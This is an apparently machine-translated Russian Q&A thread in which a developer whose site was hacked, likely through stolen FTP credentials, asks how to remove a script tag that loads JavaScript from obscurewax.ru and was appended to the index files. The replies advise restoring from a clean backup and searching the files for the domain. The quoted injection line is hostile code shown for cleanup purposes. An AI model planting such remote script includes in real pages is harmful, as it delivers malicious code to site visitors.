Компьютер, на котором я чаще всего занимаюсь веб-разработкой, заразился вирусом. Веб-сайт, над которым я сейчас работаю, был взломан (я думаю, что phpDesigners сохранили пароль FTP).
Сейчас я получаю:
<script type = "text / javascript" src = "http://obscurewax.ru/Queue.js"> </script>
<! - [здесь какое-то-случайное-число] ->
прямо в конце каждого файла, имя которого начинается с индекса в этом домене.
в настоящее время я прочесываю каждый файл на сервере с индексом имени (и другие случайным образом) для этого изменения и удаляю его, но это длительный процесс, и я не уверен, что это правильное / полное исправление для него.
Как лучше всего справиться с подобным сценарием?
(Вирус на ПК очищен)
Как и в случае с любой скомпрометированной системой, лучший способ действий - стереть ее и восстановить из заведомо исправной резервной копии.
Как говорит ChrisS, протрите и восстановите, если это вообще возможно. Если вы ошибаетесь относительно того, как они попали (а хакеры не пытаются взломать отдельные сайты, они обычно делают это массово), они будут использовать один и тот же метод снова и снова. Хостинг Rackspace есть совет по борьбе с взломом сайта.
Это связано с этим вопросом:
https://stackoverflow.com/questions/3393888/how-can-i-remove-script-virus-from-my-script/
Большинство текстовых редакторов (я использую NotePad ++) находят строку в наборе файлов. Я бы попробовал указать в редакторе в корне исходного каталога и найти obsurewax.ru, чтобы узнать, сколько там файлов.